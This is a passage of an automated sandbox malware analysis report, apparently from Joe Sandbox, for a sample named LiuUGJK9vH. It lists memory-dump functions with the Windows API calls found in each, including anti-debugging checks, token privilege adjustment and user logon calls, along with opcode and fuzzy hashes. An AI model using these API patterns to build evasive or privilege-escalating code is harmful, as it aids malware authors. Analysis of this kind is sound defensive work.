                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Internet$AvailableDataFileQueryRead
                      • String ID:
                      • API String ID: 599397726-0
                      • Opcode ID: 463c27b2723e4f7e8f8530590dc8c4e3259ae24832d69e91211cbedd98f71d3e
                      • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                      • Opcode Fuzzy Hash: 463c27b2723e4f7e8f8530590dc8c4e3259ae24832d69e91211cbedd98f71d3e
                      • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                      Function 02F91361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02F91459
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02F91463
                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 02F91470
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: 01702d2ec3c8de8929050fe233c2edc6235eb9e3c94aad57561bfa1bb0396dfb
                      • Instruction ID: f642d466957eff340c242a6836d607de750f01891a7d82dc494ac580d7bd4ab0
                      • Opcode Fuzzy Hash: 01702d2ec3c8de8929050fe233c2edc6235eb9e3c94aad57561bfa1bb0396dfb
                      • Instruction Fuzzy Hash: 7831D474D0122C9BDF21DF68DD88B8DBBB8AF08350F5041EAE50CA7250E7309B858F54
                      Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                      • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                      • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                      • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                      Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                      • GetLastError.KERNEL32 ref: 00458865
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                      • String ID:
                      • API String ID: 1922334811-0
                      • Opcode ID: f6207626ab72713f4745cb0974393abe803613072062c579429a532a820563a2
                      • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                      • Opcode Fuzzy Hash: f6207626ab72713f4745cb0974393abe803613072062c579429a532a820563a2
                      • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                      Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                      Download Yara Rule
                      APIs
                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                      • FreeSid.ADVAPI32(?), ref: 0045879B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AllocateCheckFreeInitializeMembershipToken
                      • String ID:
                      • API String ID: 3429775523-0
                      • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                      • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                      • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                      • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                      Function 02F93F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000003,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002,00000000,?,02F92038,00000003), ref: 02F93F5E
                      • TerminateProcess.KERNEL32(00000000,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002,00000000,?,02F92038,00000003), ref: 02F93F65
                      • ExitProcess.KERNEL32 ref: 02F93F77
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 3ccc85d5f79521d919538a5f2d1cb110293ca728d2c846baf7f2317e03c93f7d
                      • Instruction ID: 06adc56ccd7ee409f3da7791ede144c8b127e6f60c546810c29393c793f52259
                      • Opcode Fuzzy Hash: 3ccc85d5f79521d919538a5f2d1cb110293ca728d2c846baf7f2317e03c93f7d
                      • Instruction Fuzzy Hash: 0FE0463184490CABEF016F29DC08B587B7AEB487C9F004854FA058A121CB35DDA2CF80
                      Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                      • __time64.LIBCMT ref: 0046889B
                        • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                        • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Time$FileSystem__aulldiv__time64
                      • String ID: 0eL
                      • API String ID: 2893107130-3167399643
                      • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                      • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                      • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                      • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                      Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                      • FindClose.KERNEL32(00000000), ref: 0046C72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                      • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                      • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                      • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                      Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                      • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                      • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                      • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                      Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                      • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      • Opcode ID: 982170e3e99e89f0b957f9e7bf2e1c5e5b077e6e7339dd3e1c64156aba8fb2ed
                      • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                      • Opcode Fuzzy Hash: 982170e3e99e89f0b957f9e7bf2e1c5e5b077e6e7339dd3e1c64156aba8fb2ed
                      • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                      Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                      • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                      • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                      • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                      Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                      • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                      • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                      • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                      Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                      • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                      • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                      • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                      Function 02F939A3 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02F9399E,?,?,00000008,?,?,02F91CF4,00000000), ref: 02F93BD0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e1a7f7371a15ba8fd4db7b96cf9fb808e0651a5e0d8e4892babf853991949823
                      • Instruction ID: 537db0576824352302135bd3d8e015449eb12c06ca4d028e730ea11c5cd8cc1e
                      • Opcode Fuzzy Hash: e1a7f7371a15ba8fd4db7b96cf9fb808e0651a5e0d8e4892babf853991949823
                      • Instruction Fuzzy Hash: 80B15135610608DFEB15CF28C48AB557BE1FF453A8F258698EADACF2A1C335D991CB40
                      Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      APIs
                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: mouse_event
                      • String ID:
                      • API String ID: 2434400541-0
                      • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                      • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                      • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                      • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                      Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                      • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                      • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                      • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                      Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                      • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                      • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                      • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                      Function 02F8C7F0 Relevance: .9, Instructions: 853COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ec47b65b94a8191d1f47753c404fc0a484c978ee5daf4075b8121884faf81781
                      • Instruction ID: f2cb25e9ddf766ecefbbe76d823f0d63d22a04700ed828e7a312f0dd04139d56
                      • Opcode Fuzzy Hash: ec47b65b94a8191d1f47753c404fc0a484c978ee5daf4075b8121884faf81781
